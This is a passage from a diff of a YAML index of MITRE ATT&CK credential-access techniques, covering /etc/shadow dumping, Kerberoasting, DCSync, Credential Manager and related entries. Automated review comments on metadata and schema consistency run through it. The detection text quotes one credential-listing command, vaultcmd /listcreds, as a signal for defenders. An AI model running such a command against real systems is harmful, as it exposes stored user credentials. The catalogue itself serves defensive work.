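Review bot: T1556.009 drops `SaaS` as well as `Azure AD`, leaving `IaaS` and `Identity Provider`, whereas the other platform changes in this diff keep `SaaS` (T1110, T1110.004, T1621, T1556.006). That may simply be upstream's current platform list for conditional access policies, but if the generator applies a mapping table (Azure AD to Identity Provider, Office 365 and Google Workspace to Office Suite) a rule that also collapses SaaS would produce exactly this, so verify against the upstream object before merging.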
@@ -47391,11 +48126,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47463,34 +48197,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
to store user account information including password hashes in /etc/shadow
. By default, /etc/shadow
is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
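Review bot: the `description` block scalar carries `/etc/passwd` and `/etc/shadow` on lines of their own with the following punctuation orphaned (`. By default,` starts its own line here, and `, alerting on the pid,` does the same in `x_mitre_detection` in the next hunk). That is pre-existing damage from stripping inline code markup out of the upstream text, not something this diff introduces, but since the hunk rewrites the whole object anyway this is the moment to regenerate the text from source so the rendered description reads as sentences.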
@@ -47499,20 +48209,42 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd
and /etc/shadow
, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
@@ -47544,7 +48276,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47570,13 +48302,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
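Review bot: T1558.002 ends up with no spec version at all: this hunk removes `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and adds nothing in their place, while `x_mitre_permissions_required: - User` (a field this diff deletes from T1552.006, T1056, T1003.008, T1556.001 and T1556.005) survives, and the previous hunk moves `modified` back to '2020-03-25T21:46:46.831Z'. That is a plausible shape for an object upstream has not touched since 2020, but it is the only such object in this diff, so confirm it against the source rather than assume, and make sure nothing in the index generation requires `x_mitre_attack_spec_version` to be present.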
@@ -47593,24 +48323,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
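Review bot: nothing in this hunk changes a value; `x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_is_subtechnique` and `x_mitre_platforms` are only moved, and the same key reordering is what inflates most hunks in this diff. Emitting the YAML with a fixed key order (sorted, or the order upstream uses) would keep future syncs down to the real changes, which here are the `modified` and `x_mitre_attack_spec_version` bumps, and would make fields like `x_mitre_version` (unchanged at '1.1' despite the new `modified`) easy to verify by eye. Also visible in the unchanged detection text: `vaultcmd /listcreds:“Windows Credentials”` uses typographic quotes, which fails if someone pastes the command; normalising to ASCII quotes while regenerating would be cheap.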
@@ -47651,36 +48381,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47701,6 +48408,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -47715,52 +48423,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
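Review bot: the diff engine has paired the new `external_references` block of T1556.001 with the old one of T1556.005, so the hunk reads as though T1556.005's `id`, `created` date and four citations were deleted and T1556.001 acquired them. Review the net result per object rather than the hunk: T1556.001 should end with `id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605`, `created: '2020-02-11T19:05:02.399Z'` and the `Dell Skeleton` and `TechNet Audit Policy` references (which is what the added lines show), and T1556.005 should keep `id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48`, `created: '2022-01-13T20:02:28.349Z'` and all four of `store_pwd_rev_enc`, `how_pwd_rev_enc_1`, `how_pwd_rev_enc_2` and `dump_pwd_dcsync`, which the removed lines take away here and which must therefore come back in the following hunk.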
@@ -47782,6 +48480,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -47792,23 +48491,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
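Review bot: `x_mitre_permissions_required` (User, Administrator) is dropped from T1556.005 along with `spec_version`, which matches the 3.2.0 attack spec adopted elsewhere in this patch, but other entries in the same patch (T1556.004, T1016.001) keep that key, so the file ends up with a mixed schema. Either strip the key everywhere in one pass or note in the PR that it is a legacy field retained only where upstream still emits it.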
@@ -47879,9 +48605,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -47940,12 +48665,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
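Review bot: for T1003.003 `spec_version: '2.1'` is removed but `x_mitre_attack_spec_version: 3.1.0` stays unchanged, whereas the neighbouring T1111 and T1558.003 entries move to 3.2.0 in this patch. If 3.1.0 is what upstream currently reports for this object that is fine; otherwise this entry was regenerated from a stale source and should be rerun.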
@@ -47977,6 +48701,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -47986,7 +48711,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -47998,111 +48722,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
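Review bot: the only substantive change to T1558.003's references is the Harmj0y entry (URL moves from `https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/` to `https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/`, retrieval date updated to September 23, 2024) plus the added `revoked: false`; the rest of the hunk is the same reference entries and the T1003.006 fields shuffled into a different order, which buries the one real change. Consider having the generator emit keys and references in a stable order so future regenerations diff cleanly.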
@@ -48113,26 +48775,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
